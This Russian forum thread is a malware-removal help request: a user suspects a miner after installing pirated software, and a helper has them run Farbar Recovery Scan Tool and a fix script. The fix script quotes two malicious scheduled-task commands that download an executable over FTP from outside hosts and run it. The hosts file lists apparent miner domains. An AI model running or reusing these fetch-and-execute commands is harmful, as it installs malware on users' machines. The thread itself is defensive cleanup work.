Решена Подозрение на майнер: папки avira, mb3install и malwarebytes

  • Автор темы Автор темы amp999
  • Дата начала Дата начала
Статус
В этой теме нельзя размещать новые ответы.
A

amp999

Новый пользователь
Сообщения
9
Реакции
0
Добрый день!

По пути C:\ProgramData располагаются папки avira, mb3install и malwarebytes, которые нельзя ни открыть, ни удалить, весят по 0 байт.

2022-11-27_135403.webp


В файле hosts следующие записи:
Код: 
45.58.190.119 systemsettings.xyz
45.156.119.86 evmos.xyz
185.26.112.70 exmos.xyz
185.26.112.70 bestrig.me
185.26.112.70 bestrig.xyz
45.58.190.119 ezmos.xyz
46.8.220.224 ecmos.xyz
185.26.112.70 dashost4.xyz
45.58.190.119 wininit.club
45.58.190.119 wininit2.club
185.26.112.70 taskhostw.com
185.26.112.70 dashost.xyz
45.58.190.119 sghost.xyz
45.58.190.119 sihost.xyz
185.26.112.70 svchost.xyz
185.26.112.70 2fsdfsdgvsdvzxcwwef-defender.xyz
45.58.190.119 winhost.xyz
45.58.190.119 loders.xyz
185.26.112.70 fontdrvhost.ru
185.26.112.70 windrvs.com
45.58.190.119 dashost.club
45.58.190.119 winibackup549.club
185.26.112.70 winibackup98.club
185.26.112.70 winibackup.club
185.26.112.70 srhost.xyz
185.26.112.70 stcubegames.netxi.in
# 127.0.0.1    www.easeus.com # cured by Dr.Web
# 127.0.0.1    activation.easeus.com # cured by Dr.Web
# 127.0.0.1    track.easeus.com # cured by Dr.Web
# 127.0.0.1    66.39.112.91 # cured by Dr.Web
# 127.0.0.1    216.92.151.227 # cured by Dr.Web
# 127.0.0.1    216.92.61.7 # cured by Dr.Web
# 127.0.0.1    update.easeus.com # cured by Dr.Web

Сейчас файл hosts почищен.

Скачивалась программа для разметки дисков easeus, на данный момент уже удалена с компьютера. Как видно выше по hosts, была проведена проверка с помощью Dr.Web (журналирование не было включено в настройках, предоставить отчёт по сканированию не могу, к сожалению. Были найдены инфицированные файлы в системных папках, вроде как Dr.Web вылечил их).

Ещё скачивался офис, он активировался, но как-то криво. Постоянно в папке C:\Windows\Temp появляются логи.
 

Вложения

Скачайте AV block remover.
Распакуйте, запустите и следуйте инструкциям. Если не запускается, переименуйте файл AVbr.exe в, напри-мер, AV-br.exe (или любое другое имя).
Как вариант, можно воспользоваться версией со случайным именем. Если и так не запускается, запустите его в безопасном режиме с поддержкой сети.

В результате работы утилиты появится отчёт AV_block_remove_дата-время.log, прикрепите его к следующему сообщению.

После перезагрузки системы соберите новый CollectionLog Автологером в обычном режиме загрузки.
 
Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе.
  • Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
1. Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
2. Убедитесь, что в окне Optional Scan (Дополнительные опции) отмечены List BCD и 90 Days Files.
3. Нажмите кнопку Scan (Сканировать).
4. После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа.
5. Если программа была запущена в первый раз, также будет создан отчет (Addition.txt).
6. Файлы FRST.txt и Addition.txt заархивируйте (в один общий архив) и прикрепите к сообщению.
 
1. Выделите следующий код и скопируйте в буфер обмена (правая кнопка мышиКопировать)
Код: 
Start::
CreateRestorePoint:
HKLM\SOFTWARE\Microsoft\Windows Defender: [DisableAntiSpyware] Ограничение <==== ВНИМАНИЕ
HKLM\SOFTWARE\Microsoft\Windows Defender: [DisableAntiVirus] Ограничение <==== ВНИМАНИЕ
HKU\S-1-5-21-4133732187-2749906039-182019548-1001\...\MountPoints2: {015886c1-3272-11eb-b130-28c63faf6dd7} - "F:\HiSuiteDownLoader.exe" 
HKU\S-1-5-21-4133732187-2749906039-182019548-1001\...\MountPoints2: {07349b40-21c1-11eb-b12c-28c63faf6dd7} - "F:\HiSuiteDownLoader.exe"
GroupPolicy\User: Ограничение ? <==== ВНИМАНИЕ
Task: {05E20FA4-8EFB-4B33-84A5-661542B7EF40} - \MSI LEDBar Controller -> Нет файла <==== ВНИМАНИЕ
Task: {0C518199-F01B-42CF-9CB7-16710B002812} - \Microsoft\Windows\EnterpriseMgmt\MDMMaintenenceTask -> Нет файла <==== ВНИМАНИЕ
Task: {18B684A0-B782-43EA-9E6B-9DB707586251} - System32\Tasks\AdobeUpdateFlac2 => cmd /c echo open ftp2.webpublicservices.org>>ps&echo test>>ps&echo 1433>>ps&echo get c.rar c:\windows\help\AdobeFlac.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\AdobeFlac.exe
Task: {25ED74BC-B321-4746-BBB0-4E650EFD6FFD} - \NahimicVRSvc32Run -> Нет файла <==== ВНИМАНИЕ
Task: {2CDA7B85-C0B0-46BA-AFFF-181EA166BE19} - \Nahimic2Svc64Run -> Нет файла <==== ВНИМАНИЕ
Task: {34083E24-DC53-4B88-A0B6-CEDDC608F236} - \Nahimic2Svc32Run -> Нет файла <==== ВНИМАНИЕ
Task: {3DA280C5-B6A5-4E46-A575-2C7604D19999} - \OneDrive Standalone Update Task v2 -> Нет файла <==== ВНИМАНИЕ
Task: {4B6926D3-D490-4D93-82CE-D109F1D1BC80} - \Microsoft\Windows\WindowsUpdate\sih -> Нет файла <==== ВНИМАНИЕ
Task: {4EF17C2C-22FF-4AA2-92B4-CCBD04075721} - \Microsoft\Windows\UpdateOrchestrator\Maintenance Install -> Нет файла <==== ВНИМАНИЕ
Task: {508E3B51-9877-4474-8D07-5737313511AB} - \NahimicVRSvc64Run -> Нет файла <==== ВНИМАНИЕ
Task: {51E47231-8E0D-47E7-8D83-5BD9192998DD} - System32\Tasks\AdobeUpdateFlac => cmd /c echo open ftp2.ha7455h6fi1.net>>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get b.rar c:\windows\Adobeupdate.exe>>s&echo bye>>s&ftp -s:s&c:\windows\Adobeupdate.exe
Task: {5D81326C-D6EC-49A0-AAB5-D8A874E06E83} - \Microsoft\Windows\UpdateOrchestrator\Reboot -> Нет файла <==== ВНИМАНИЕ
Task: {5F7BC060-134D-40BA-8014-6364F74815C8} - \MSI OCFanKnob Controller -> Нет файла <==== ВНИМАНИЕ
Task: {7072963F-3763-4E9F-A1F5-DE9703BAE827} - \Microsoft\Windows\Shell\FamilySafetyMonitorToastTask -> Нет файла <==== ВНИМАНИЕ
Task: {AAA476FA-B6D3-4A0B-BFE9-92966C8274F4} - \Microsoft\Windows\UpdateOrchestrator\USO_UxBroker_ReadyToReboot -> Нет файла <==== ВНИМАНИЕ
Task: {C3504016-73C2-470E-95EF-A06B60AE947A} - \Microsoft\Windows\UpdateOrchestrator\USO_UxBroker_Display -> Нет файла <==== ВНИМАНИЕ
Task: {D008546F-69C9-4844-8C70-BE16F1C11871} - \Microsoft\Windows\UpdateOrchestrator\Combined Scan Download Install -> Нет файла <==== ВНИМАНИЕ
Task: {EC32FE44-A74A-4D0A-98E1-3FEF5261BF99} - \Nahimic2UILauncherRun -> Нет файла <==== ВНИМАНИЕ
Task: {EDEC226D-76E4-431E-8D0D-E46D05AE60C6} - \Microsoft\Windows\UpdateOrchestrator\Policy Install -> Нет файла <==== ВНИМАНИЕ
Edge Extension: (Нет имени) -> AutoFormFill_5ED10D46BD7E47DEB1F3685D2C0FCE08 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\AutoFormFill [не найдено]
Edge Extension: (Нет имени) -> BookReader_B171F20233094AC88D05A8EF7B9763E8 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\BookViewer [не найдено]
Edge Extension: (Нет имени) -> LearningTools_7706F933-971C-41D1-9899-8A026EB5D824 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\LearningTools [не найдено]
Edge Extension: (Нет имени) -> PinJSAPI_EC01B57063BE468FAB6DB7EBFC3BF368 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\PinJSAPI [не найдено]
2022-11-27 17:19 - 2022-11-27 18:14 - 000000546 _____ C:\Windows\system32\ps
2022-11-27 17:19 - 2022-11-27 18:14 - 000000540 _____ C:\Windows\system32\s
Unlock: C:\DrWeb Quarantine
AlternateDataStreams: C:\Users\amp99\AppData\Local\Temp:$DATA [16]
AlternateDataStreams: C:\Users\Public\DRM:احتضان [48]
Reboot:
End::
2. Запустите Farbar Recovery Scan Tool от имени Администратора по правой кнопке мыши.
3. Нажмите один раз на кнопку Fix (Исправить) и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении.
  • Обратите внимание: будет выполнена перезагрузка компьютера.
 
В папке по пути C:\Windows\Temp создаются какие-то странные логи. Файл с названием drw-18b8-8ea00f0-fshc.tmp.db и другие заархивировать не могу, т.к. он используются в данный момент
2022-11-28_213819.png
2022-11-28_214005.png


UPD: Я так понимаю, что причина в нелицензионном софте от Adobe. C:\Users\Public\Documents
1669661076695.webp
 

Вложения

Последнее редактирование:
Я же могу лог adobegc.log прикрепить прям здесь? Я удалил папку по пути C:\Users\Public\Documents, но вот adobegc.log заархивировать всё ещё не могу, т.к. он занят другим процессом.
Эта папка была остатком от Adobe Lightroom. Мне срочно требовалось скачать по работе, но нарвался на какую-то кривую версию, и я всё снёс, да и работу эту послал куда подальше. А вот файлы от лайтрума в общих папках остались.
Мне просто не ясно, зачем адоб так яро проверять лицензию
Код: 
11/27/22 18:07:01:599 | [INFO] |  |  |  | AGSService |  |  | 4336 | *********** AGS Service Launched = 8.1.0.3 ************
11/27/22 18:07:01:599 | [INFO] |  |  |  | AGSService |  |  | 4336 | Setting mitigation policies
11/27/22 18:07:01:599 | [INFO] |  |  |  | AdobeGCMitigationPolicyLog |  |  | 4336 | ProcessExtensionPointDisablePolicy set successfully
11/27/22 18:07:01:599 | [INFO] |  |  |  | AdobeGCMitigationPolicyLog |  |  | 4336 | ProcessDynamicCodePolicy set successfully
11/27/22 18:07:01:599 | [INFO] |  |  |  | AdobeGCMitigationPolicyLog |  |  | 4336 | ProcessSignaturePolicy set successfully
11/27/22 18:07:01:599 | [INFO] |  |  |  | AdobeGCMitigationPolicyLog |  |  | 4336 | ProcessFontDisablePolicy set successfully
11/27/22 18:07:01:599 | [INFO] |  |  |  | AdobeGCMitigationPolicyLog |  |  | 4336 | ProcessImageLoadPolicy set successfully
11/27/22 18:07:01:631 | [INFO] |  |  |  | AGCDirectoryWatcher |  |  | 4184 | *********** AGM Service Launched = 8.1.0.3 ************
11/27/22 18:07:01:631 | [INFO] |  |  |  | AGCDirectoryWatcher |  |  | 4184 | Setting mitigation policies
11/27/22 18:07:01:632 | [INFO] |  |  |  | AdobeGCMitigationPolicyLog |  |  | 4184 | ProcessExtensionPointDisablePolicy set successfully
11/27/22 18:07:01:632 | [INFO] |  |  |  | AdobeGCMitigationPolicyLog |  |  | 4184 | ProcessDynamicCodePolicy set successfully
11/27/22 18:07:01:632 | [INFO] |  |  |  | AdobeGCMitigationPolicyLog |  |  | 4184 | ProcessSignaturePolicy set successfully
11/27/22 18:07:01:632 | [INFO] |  |  |  | AdobeGCMitigationPolicyLog |  |  | 4184 | ProcessFontDisablePolicy set successfully
11/27/22 18:07:01:632 | [INFO] |  |  |  | AdobeGCMitigationPolicyLog |  |  | 4184 | ProcessImageLoadPolicy set successfully
11/27/22 18:07:01:685 | [ERROR] |  |  |  | AGSService |  |  | 4928 | Caller user name:�������
11/27/22 18:07:01:685 | [ERROR] |  |  |  | AGSService |  |  | 4928 | Started creating entries for uninstaller
11/27/22 18:07:01:689 | [INFO] |  |  |  | AGSService |  |  | 4928 | AdobeGCData folder already exists
11/27/22 18:07:01:689 | [INFO] |  |  |  | AGSService |  |  | 4928 | AdobeGCData folder: checking for junction/symlink
11/27/22 18:07:01:690 | [INFO] |  |  |  | AdobeGCServiceUtilityLog |  |  | 4928 | GC local storage: Validating permissions of C:\Users\Public\Documents\AdobeGCData
11/27/22 18:07:01:691 | [INFO] |  |  |  | AdobeGCServiceUtilityLog |  |  | 4928 | GC local storage: Valid DACL permissions found
11/27/22 18:07:01:691 | [INFO] |  |  |  | AdobeGCServiceUtilityLog |  |  | 4928 | GC local storage: Valid SACL permissions found
11/27/22 18:07:01:692 | [INFO] |  |  |  | AdobeGCServiceUtilityLog |  |  | 4928 | GC local storage: Validating permissions of C:\Users\Public\Documents\AdobeGCData\AdobeNGLAppIDMap.db
11/27/22 18:07:01:694 | [INFO] |  |  |  | AdobeGCServiceUtilityLog |  |  | 4928 | GC local storage: Valid DACL permissions found
11/27/22 18:07:01:694 | [INFO] |  |  |  | AdobeGCServiceUtilityLog |  |  | 4928 | GC local storage: Valid SACL permissions found
11/27/22 18:07:01:694 | [INFO] |  |  |  | AdobeGCServiceUtilityLog |  |  | 4928 | GC local storage: Validating permissions of C:\Users\Public\Documents\AdobeGCData\AdobeGCLaunchEvent.db
11/27/22 18:07:01:699 | [INFO] |  |  |  | AdobeGCServiceUtilityLog |  |  | 4928 | GC local storage: Valid DACL permissions found
11/27/22 18:07:01:699 | [INFO] |  |  |  | AdobeGCServiceUtilityLog |  |  | 4928 | GC local storage: Valid SACL permissions found
11/27/22 18:07:01:699 | [INFO] |  |  |  | AdobeGCServiceUtilityLog |  |  | 4928 | GC local storage: Validating permissions of C:\Users\Public\Documents\AdobeGCData\AdobeGCData.db
11/27/22 18:07:01:699 | [INFO] |  |  |  | AdobeGCServiceUtilityLog |  |  | 4928 | GC local storage: Validating permissions of C:\Users\Public\Documents\AdobeGCData\adobegc.log
11/27/22 18:07:01:700 | [INFO] |  |  |  | AdobeGCServiceUtilityLog |  |  | 4928 | GC local storage: Valid DACL permissions found
11/27/22 18:07:01:700 | [INFO] |  |  |  | AdobeGCServiceUtilityLog |  |  | 4928 | GC local storage: Valid SACL permissions found
11/27/22 18:07:01:700 | [INFO] |  |  |  | AGSService |  |  | 4928 | Successfully created/fetched AdobeGCData Folder
11/27/22 18:07:01:700 | [INFO] |  |  |  | AGSService |  |  | 4928 | Thread...
11/27/22 18:07:01:702 | [INFO] |  |  |  | WinSandboxingUtilities |  |  | 5044 | Sandbox process request: 1 || UninstallClient * AdobeGenuineData *  |
11/27/22 18:07:01:705 | [ERROR] |  |  |  | WinSandboxingUtilities |  |  | 5044 | Failed to find explorer process id
11/27/22 18:07:01:705 | [ERROR] |  |  |  | WinSandboxingUtilities |  |  | 5044 | Failed to get explorer process token
11/27/22 18:07:01:705 | [INFO] |  |  |  | WinSandboxingUtilities |  |  | 5044 | Going to sleep for 20 mins and then will try again
11/27/22 18:07:01:727 | [DEBUG] |  |  |  | AdobeGCClientMain |  |  | 5012 | Initializing Directory Watcher for the directory : C
11/27/22 18:07:02:176 | [INFO] |  |  |  | AGCDirectoryWatcher |  |  | 5012 | Process Creation Monitoring enabled...
11/27/22 18:07:02:176 | [DEBUG] |  |  |  | AdobeGCClientMain |  |  | 5012 | Directory Watcher successfully initiated
11/27/22 18:07:02:181 | [DEBUG] |  |  |  | AGCDirectoryWatcher |  |  | 5840 | Waiting for WRITE operation Callback...
11/27/22 18:14:21:790 | [INFO] |  |  |  | AGSService |  |  | 4380 | *********** AGS Service Launched = 8.1.0.3 ************
11/27/22 18:14:21:790 | [INFO] |  |  |  | AGSService |  |  | 4380 | Setting mitigation policies
11/27/22 18:14:21:790 | [INFO] |  |  |  | AdobeGCMitigationPolicyLog |  |  | 4380 | ProcessExtensionPointDisablePolicy set successfully
11/27/22 18:14:21:790 | [INFO] |  |  |  | AdobeGCMitigationPolicyLog |  |  | 4380 | ProcessDynamicCodePolicy set successfully
11/27/22 18:14:21:790 | [INFO] |  |  |  | AdobeGCMitigationPolicyLog |  |  | 4380 | ProcessSignaturePolicy set successfully
11/27/22 18:14:21:790 | [INFO] |  |  |  | AdobeGCMitigationPolicyLog |  |  | 4380 | ProcessFontDisablePolicy set successfully
11/27/22 18:14:21:790 | [INFO] |  |  |  | AdobeGCMitigationPolicyLog |  |  | 4380 | ProcessImageLoadPolicy set successfully
11/27/22 18:14:21:799 | [INFO] |  |  |  | AGCDirectoryWatcher |  |  | 4400 | *********** AGM Service Launched = 8.1.0.3 ************
11/27/22 18:14:21:799 | [INFO] |  |  |  | AGCDirectoryWatcher |  |  | 4400 | Setting mitigation policies
11/27/22 18:14:21:799 | [INFO] |  |  |  | AdobeGCMitigationPolicyLog |  |  | 4400 | ProcessExtensionPointDisablePolicy set successfully
11/27/22 18:14:21:799 | [INFO] |  |  |  | AdobeGCMitigationPolicyLog |  |  | 4400 | ProcessDynamicCodePolicy set successfully
11/27/22 18:14:21:799 | [INFO] |  |  |  | AdobeGCMitigationPolicyLog |  |  | 4400 | ProcessSignaturePolicy set successfully
11/27/22 18:14:21:799 | [INFO] |  |  |  | AdobeGCMitigationPolicyLog |  |  | 4400 | ProcessFontDisablePolicy set successfully
11/27/22 18:14:21:799 | [INFO] |  |  |  | AdobeGCMitigationPolicyLog |  |  | 4400 | ProcessImageLoadPolicy set successfully
11/27/22 18:14:21:823 | [ERROR] |  |  |  | AGSService |  |  | 4908 | Caller user name:�������
11/27/22 18:14:21:823 | [ERROR] |  |  |  | AGSService |  |  | 4908 | Started creating entries for uninstaller
11/27/22 18:14:21:832 | [INFO] |  |  |  | AGSService |  |  | 4908 | AdobeGCData folder already exists
11/27/22 18:14:21:832 | [INFO] |  |  |  | AGSService |  |  | 4908 | AdobeGCData folder: checking for junction/symlink
11/27/22 18:14:21:858 | [INFO] |  |  |  | AdobeGCServiceUtilityLog |  |  | 4908 | GC local storage: Validating permissions of C:\Users\Public\Documents\AdobeGCData
11/27/22 18:14:21:860 | [DEBUG] |  |  |  | AdobeGCClientMain |  |  | 4956 | Initializing Directory Watcher for the directory : C
11/27/22 18:14:21:915 | [INFO] |  |  |  | AdobeGCServiceUtilityLog |  |  | 4908 | GC local storage: Valid DACL permissions found
11/27/22 18:14:21:915 | [INFO] |  |  |  | AdobeGCServiceUtilityLog |  |  | 4908 | GC local storage: Valid SACL permissions found
11/27/22 18:14:21:915 | [INFO] |  |  |  | AdobeGCServiceUtilityLog |  |  | 4908 | GC local storage: Validating permissions of C:\Users\Public\Documents\AdobeGCData\AdobeNGLAppIDMap.db
11/27/22 18:14:21:920 | [INFO] |  |  |  | AdobeGCServiceUtilityLog |  |  | 4908 | GC local storage: Valid DACL permissions found
11/27/22 18:14:21:920 | [INFO] |  |  |  | AdobeGCServiceUtilityLog |  |  | 4908 | GC local storage: Valid SACL permissions found
11/27/22 18:14:21:920 | [INFO] |  |  |  | AdobeGCServiceUtilityLog |  |  | 4908 | GC local storage: Validating permissions of C:\Users\Public\Documents\AdobeGCData\AdobeGCLaunchEvent.db
11/27/22 18:14:21:920 | [INFO] |  |  |  | AdobeGCServiceUtilityLog |  |  | 4908 | GC local storage: Valid DACL permissions found
11/27/22 18:14:21:920 | [INFO] |  |  |  | AdobeGCServiceUtilityLog |  |  | 4908 | GC local storage: Valid SACL permissions found
11/27/22 18:14:21:920 | [INFO] |  |  |  | AdobeGCServiceUtilityLog |  |  | 4908 | GC local storage: Validating permissions of C:\Users\Public\Documents\AdobeGCData\AdobeGCData.db
11/27/22 18:14:21:920 | [INFO] |  |  |  | AdobeGCServiceUtilityLog |  |  | 4908 | GC local storage: Validating permissions of C:\Users\Public\Documents\AdobeGCData\adobegc.log
11/27/22 18:14:21:921 | [INFO] |  |  |  | AdobeGCServiceUtilityLog |  |  | 4908 | GC local storage: Valid DACL permissions found
11/27/22 18:14:21:921 | [INFO] |  |  |  | AdobeGCServiceUtilityLog |  |  | 4908 | GC local storage: Valid SACL permissions found
11/27/22 18:14:21:921 | [INFO] |  |  |  | AGSService |  |  | 4908 | Successfully created/fetched AdobeGCData Folder
11/27/22 18:14:21:921 | [INFO] |  |  |  | AGSService |  |  | 4908 | Thread...
11/27/22 18:14:21:931 | [INFO] |  |  |  | WinSandboxingUtilities |  |  | 5252 | Sandbox process request: 1 || UninstallClient * AdobeGenuineData *  |
11/27/22 18:14:21:934 | [ERROR] |  |  |  | WinSandboxingUtilities |  |  | 5252 | Failed to find explorer process id
11/27/22 18:14:21:934 | [ERROR] |  |  |  | WinSandboxingUtilities |  |  | 5252 | Failed to get explorer process token
11/27/22 18:14:21:934 | [INFO] |  |  |  | WinSandboxingUtilities |  |  | 5252 | Going to sleep for 20 mins and then will try again
11/27/22 18:14:22:805 | [INFO] |  |  |  | AGCDirectoryWatcher |  |  | 4956 | Process Creation Monitoring enabled...
11/27/22 18:14:22:806 | [DEBUG] |  |  |  | AdobeGCClientMain |  |  | 4956 | Directory Watcher successfully initiated
11/27/22 18:14:22:818 | [DEBUG] |  |  |  | AGCDirectoryWatcher |  |  | 6656 | Waiting for WRITE operation Callback...
11/27/22 18:34:21:940 | [INFO] |  |  |  | WinSandboxingUtilities |  |  | 5252 | Awake from sleep and trying again to get explorer token
11/27/22 18:34:22:178 | [INFO] |  |  |  | WinSandboxingUtilities |  |  | 5252 | Sandbox process response: 3 ||  *  |
11/27/22 18:34:22:178 | [INFO] |  |  |  | AGSService |  |  | 5252 | Thread inside...
11/27/22 18:34:22:178 | [INFO] |  |  |  | AGSService |  |  | 5252 | Thread calling CFU...
11/27/22 18:34:22:183 | [INFO] |  |  |  | AdobeGCUpdater |  |  | 5252 | ***********AdobeGC Updater library invoked = 8.1.0.3 ************
11/27/22 18:34:22:183 | [INFO] |  |  |  | AdobeGCUpdaterCFU |  |  | 5252 | Perform WF started
11/27/22 18:34:22:184 | [INFO] |  |  |  | AdobeGCUpdaterCFU |  |  | 5252 | Perform WF completed
11/27/22 18:34:22:184 | [INFO] |  |  |  | AGSService |  |  | 5252 | Thread cfu launched...
11/27/22 18:34:22:184 | [DEBUG] |  |  |  | AdobeGCUpdaterCFU |  |  | 12364 | Trying to acquire the semaphore
11/27/22 18:34:22:184 | [DEBUG] |  |  |  | AdobeGCUpdaterCFU |  |  | 12364 | Semaphore acquired
11/27/22 18:34:22:185 | [INFO] |  |  |  | AdobeGCHostfileValidation |  |  | 12364 | Hostfile opened successfully
11/27/22 18:34:22:185 | [DEBUG] |  |  |  | AdobeGCHostfileValidation |  |  | 12364 | Checking if gocart server url is blocked in hostfile
11/27/22 18:34:22:185 | [INFO] |  |  |  | SLCoreService |  |  | 12364 | Starting up SLCore 2.0 Release (build 2.0.1.360321).
11/27/22 18:34:22:185 | [ERROR] |  |  |  | SLCoreService |  |  | 12364 | user based licensing: 0
11/27/22 18:34:22:185 | [INFO] |  |  |  | SLCoreService |  |  | 12364 | Service construction took 0.1 ms and succeed.
11/27/22 18:34:22:420 | [INFO] |  |  |  | SLCoreService |  |  | 12364 | Shutting down SLCore 2.0 Release (build 2.0.1.360321).
11/27/22 18:34:22:420 | [INFO] |  |  |  | SLCoreService |  |  | 12364 | Service destruction took 0.1 ms and succeed.
11/27/22 18:34:22:420 | [ERROR] |  |  |  | AdobeGCIALWrapper |  |  | 12364 | Fetching server URL from dispatch table
11/27/22 18:34:22:422 | [INFO] |  |  |  | DispatchClientLib |  |  | 12364 | __OOBELIB_LOG_FILE__
11/27/22 18:34:22:422 | [INFO] |  |  |  | DispatchClientLib |  |  | 12364 | Dispatch table loaded from path: C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\dispatchtable.xml
11/27/22 18:34:22:423 | [INFO] |  |  |  | DispatchClientLib |  |  | 12364 | (re)load Local Dispatch Table status-[0].
11/27/22 18:34:22:423 | [INFO] |  |  |  | DispatchClientLib |  |  | 12364 | Scope : [2]
11/27/22 18:34:22:423 | [INFO] |  |  |  | DispatchClientLib |  |  | 12364 | Setting scope to GM
11/27/22 18:34:22:423 | [INFO] |  |  |  | AdobeGCIALWrapper |  |  | 12364 | AdobeIALClient 1.0 Release (build 1.0.6.3) initializing session...
11/27/22 18:34:22:423 | [INFO] |  |  |  | DispatchClientLib |  |  | 12364 | EndPoint requested: [PostRulesData]
11/27/22 18:34:22:423 | [INFO] |  |  |  | DispatchClientLib |  |  | 12364 | Length of the URL: [50]
11/27/22 18:34:22:423 | [INFO] |  |  |  | DispatchClientLib |  |  | 12364 | Returning from getEndpointAddr: [0]
11/27/22 18:34:22:423 | [INFO] |  |  |  | DispatchClientLib |  |  | 12364 | EndPoint requested: [PostRulesData]
11/27/22 18:34:22:423 | [INFO] |  |  |  | DispatchClientLib |  |  | 12364 | Length of the URL: [50]
11/27/22 18:34:22:423 | [INFO] |  |  |  | DispatchClientLib |  |  | 12364 | URL found [https://genuine.adobe.com/server/services/check/v1]
11/27/22 18:34:22:423 | [INFO] |  |  |  | DispatchClientLib |  |  | 12364 | Returning from getEndpointAddr: [0]
11/27/22 18:34:22:423 | [ERROR] |  |  |  | AdobeGCIALWrapper |  |  | 12364 | Fetching server URL from dispatch table
11/27/22 18:34:22:423 | [INFO] |  |  |  | DispatchClientLib |  |  | 12364 | Dispatch table loaded from path: C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\dispatchtable.xml
11/27/22 18:34:22:424 | [INFO] |  |  |  | DispatchClientLib |  |  | 12364 | (re)load Local Dispatch Table status-[0].
11/27/22 18:34:22:424 | [INFO] |  |  |  | DispatchClientLib |  |  | 12364 | Scope : [2]
11/27/22 18:34:22:424 | [INFO] |  |  |  | DispatchClientLib |  |  | 12364 | Setting scope to GM
11/27/22 18:34:22:424 | [INFO] |  |  |  | AdobeGCIALWrapper |  |  | 12364 | AdobeIALClient 1.0 Release (build 1.0.6.3) initializing session...
11/27/22 18:34:22:425 | [INFO] |  |  |  | DispatchClientLib |  |  | 12364 | EndPoint requested: [ETSEndPoint]
11/27/22 18:34:22:425 | [INFO] |  |  |  | DispatchClientLib |  |  | 12364 | Length of the URL: [48]
11/27/22 18:34:22:425 | [INFO] |  |  |  | DispatchClientLib |  |  | 12364 | Returning from getEndpointAddr: [0]
11/27/22 18:34:22:425 | [INFO] |  |  |  | DispatchClientLib |  |  | 12364 | EndPoint requested: [ETSEndPoint]
11/27/22 18:34:22:425 | [INFO] |  |  |  | DispatchClientLib |  |  | 12364 | Length of the URL: [48]
11/27/22 18:34:22:425 | [INFO] |  |  |  | DispatchClientLib |  |  | 12364 | URL found [https://na1e.services.adobe.com/hsmessaging/rest]
11/27/22 18:34:22:425 | [INFO] |  |  |  | DispatchClientLib |  |  | 12364 | Returning from getEndpointAddr: [0]
11/27/22 18:34:22:425 | [INFO] |  |  |  | AdobeGCClientNSLookup |  |  | 12364 | Delete server domain blocked key
11/27/22 18:34:22:425 | [INFO] |  |  |  | WinSandboxingUtilities |  |  | 12364 | Sandbox process request: 3 || ServerDomainBlocked * AdobeGenuineNSLookUpData *  |
11/27/22 18:34:22:667 | [INFO] |  |  |  | WinSandboxingUtilities |  |  | 12364 | Sandbox process response: 1 ||
11/27/22 18:34:22:667 | [INFO] |  |  |  | AdobeGCClientNSLookup |  |  | 12364 | Delete server alias blocked key
11/27/22 18:34:22:667 | [INFO] |  |  |  | WinSandboxingUtilities |  |  | 12364 | Sandbox process request: 3 || ServerAliasBlocked * AdobeGenuineNSLookUpData *  |
11/27/22 18:34:22:905 | [INFO] |  |  |  | WinSandboxingUtilities |  |  | 12364 | Sandbox process response: 1 ||
11/27/22 18:34:22:905 | [INFO] |  |  |  | AdobeGCClientNSLookup |  |  | 12364 | Delete server alias value
11/27/22 18:34:22:905 | [INFO] |  |  |  | WinSandboxingUtilities |  |  | 12364 | Sandbox process request: 3 || ServerAlias * AdobeGenuineNSLookUpData *  |
11/27/22 18:34:23:142 | [INFO] |  |  |  | WinSandboxingUtilities |  |  | 12364 | Sandbox process response: 1 ||
11/27/22 18:34:23:142 | [INFO] |  |  |  | AdobeGCUpdaterCFU |  |  | 12364 | Threaded CFU Started
11/27/22 18:34:23:142 | [INFO] |  |  |  | AdobeGCUpdaterCFU |  |  | 12364 | Update call started
11/27/22 18:34:23:143 | [INFO] |  |  |  | AdobeGCUpdaterCFU |  |  | 12364 | Suppress Update Flag = 0
11/27/22 18:34:23:143 | [INFO] |  |  |  | AdobeGCUpdaterCFU |  |  | 12364 | GC Kill Switch = 0
11/27/22 18:34:23:143 | [INFO] |  |  |  | WinSandboxingUtilities |  |  | 12364 | Sandbox process request: 1 || NextUpdateCheckDate * AdobeGenuineWaitTimestamps *  |
11/27/22 18:34:23:378 | [INFO] |  |  |  | WinSandboxingUtilities |  |  | 12364 | Sandbox process response: 1 || 1669626942 *  |
11/27/22 18:34:23:378 | [ERROR] |  |  |  | AdobeGCUpdaterCFU |  |  | 12364 | Time flag read
11/27/22 18:34:23:378 | [INFO] |  |  |  | AdobeGCUpdaterCFU |  |  | 12364 | LastUpdateCheckDurationPassed from cache 1669626942
11/27/22 18:34:23:378 | [INFO] |  |  |  | AdobeGCUpdaterCFU |  |  | 12364 | LastUpdateCheckDurationPassed cached 1669626942 , curr 1669563263 res = 0
11/27/22 18:34:23:378 | [INFO] |  |  |  | AdobeGCUpdaterCFU |  |  | 12364 | Suppressing update check for this launch
11/27/22 18:34:23:378 | [INFO] |  |  |  | AdobeGCUpdaterCFU |  |  | 12364 | Update call ended
11/27/22 18:34:23:378 | [INFO] |  |  |  | AdobeGCUpdaterCFU |  |  | 12364 | GCClient App not being downloaded
11/27/22 18:34:23:378 | [INFO] |  |  |  | AGSService |  |  | 12364 |
11/27/22 18:34:23:378 | [INFO] |  |  |  | AdobeGCUpdaterCFU |  |  | 12364 | Threaded CFU Ended
11/27/22 18:34:23:378 | [INFO] |  |  |  | AdobeGCUpdaterCFU |  |  | 12364 | Semaphore signalled
11/27/22 18:34:24:204 | [INFO] |  |  |  | AGSService |  |  | 4908 | Thread Finished ...
